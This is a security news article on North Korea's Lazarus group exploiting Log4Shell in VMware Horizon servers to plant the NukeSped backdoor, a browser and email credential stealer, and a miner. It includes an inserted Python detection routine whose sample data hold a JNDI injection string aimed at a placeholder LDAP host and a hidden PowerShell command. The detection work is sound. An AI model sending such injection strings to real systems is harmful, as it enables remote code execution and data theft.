The North Korean hacking group known as Lazarus is exploiting the Log4J remote code execution vulnerability to inject backdoors that fetch information-stealing payloads on VMware Horizon servers.
The vulnerability is tracked as CVE-2021-44228, aka Log4Shell, and impacts many products, including VMware Horizon.
The exploitation of vulnerable Horizon deployments started in January 2022, but many admins have yet to apply the available security updates.
According to a report published by analysts at Ahnlab’s ASEC, Lazarus has been targeting vulnerable VMware products via Log4Shell since April 2022.
Targeting VMware Horizon servers
To start the attack, the threat actors exploit the Log4j vulnerability through VMware Horizon's Apache Tomcat service to execute a PowerShell command. This PowerShell command ultimately leads to the installation of the NukeSped backdoor on the server.
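As an added defensive example (not code from the original report or from ASEC), the routine below checks the two observable stages of the chain just described: a JNDI lookup string in a Horizon Tomcat request log line, and the Tomcat service process spawning PowerShell. The process name ws_TomcatService.exe is an assumption to verify in your own environment, and all log lines and events are constructed samples.

```python
import re
from dataclasses import dataclass

# Process names the rule keys on. ws_TomcatService.exe is assumed to be the
# Tomcat service of a VMware Horizon Connection Server; verify in your estate.
TOMCAT_PARENTS = {"ws_tomcatservice.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# Plain ${jndi:...} lookup string; obfuscated forms need extra patterns.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_tomcat_to_powershell(ev: ProcessEvent) -> bool:
    """True when the Horizon Tomcat service directly spawns PowerShell."""
    return (basename(ev.parent_image) in TOMCAT_PARENTS
            and basename(ev.image) in POWERSHELL_IMAGES)


def has_jndi_lookup(line: str) -> bool:
    """True when a request log line carries a JNDI lookup string."""
    return bool(JNDI_LOOKUP.search(line))


# Constructed sample telemetry (not real captures).
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Program Files\VMware\VMware View\Server\bin\ws_TomcatService.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -nop -w hidden -c <PLACEHOLDER>"),
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe"),
]
SAMPLE_REQUESTS = [
    '10.0.0.5 - - [01/May/2022:10:00:00 +0000] "GET /portal/ HTTP/1.1" 200 "${jndi:ldap://EXAMPLE-PLACEHOLDER/a}"',
    '10.0.0.6 - - [01/May/2022:10:00:01 +0000] "GET /portal/ HTTP/1.1" 200 "Mozilla/5.0"',
]


def find_suspicious(events: list, requests: list) -> dict:
    """Apply both rules and return the hits grouped by telemetry type."""
    return {"process": [e for e in events if is_tomcat_to_powershell(e)],
            "request": [r for r in requests if has_jndi_lookup(r)]}
```

A hit on either rule on a Horizon Connection Server is worth treating as a likely Log4Shell exploitation attempt rather than noise.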
NukeSped (or NukeSpeed) is a backdoor malware first associated with DPRK hackers in the summer of 2018 and then linked to a 2020 campaign orchestrated by Lazarus.
The latest variant sampled and analyzed by ASEC is written in C++ and uses RC4 encryption for communicating securely with the C2 infrastructure. Previously, it used XOR.
NukeSped performs various espionage operations in the compromised environment, such as taking screenshots, recording key presses, and accessing files. Moreover, NukeSped can run command-line commands.
Two new modules seen in the current NukeSped variant are one for dumping USB contents and one for accessing web camera devices.
Lazarus uses NukeSped to install an additional console-based information stealer, which collects information stored in web browsers.
More specifically, the malware analyzed by ASEC can steal the following data:
- Account credentials and browsing history stored in Google Chrome, Mozilla Firefox, Internet Explorer, Opera, and Naver Whale.
- Email account information stored in Outlook Express, MS Office Outlook, and Windows Live Mail.
- Names of recently used files from MS Office (PowerPoint, Excel, and Word) and Hancom 2010.
In some attacks, Lazarus was observed deploying Jin Miner instead of NukeSped by leveraging Log4Shell.
Since Jin Miner is a cryptocurrency miner, Lazarus probably used it on less critical systems targeted for monetary gains instead of cyber-espionage.
Log4Shell remains largely unresolved
Since the start of the year, Lazarus has been spotted using LoLBins in Windows-targeting campaigns and malicious cryptocurrency apps to compromise Windows and macOS computers.
The Log4Shell exploitation adds to these, underlining both the variety of tactics the hacking group uses and the fact that the critical RCE flaw remains a significant security problem.
In March, most exploitation attempts were carried out by botnets, so many assumed that the targeting focused on poorly maintained systems of lesser importance.
In April, security analysts reminded the public that the Log4Shell attack surface remains huge and will persist for a long time due to practical challenges.
The exploitation attempts of sophisticated threat actors are too few to register in statistics, but this shouldn’t create the illusion that Log4Shell has faded into insignificance.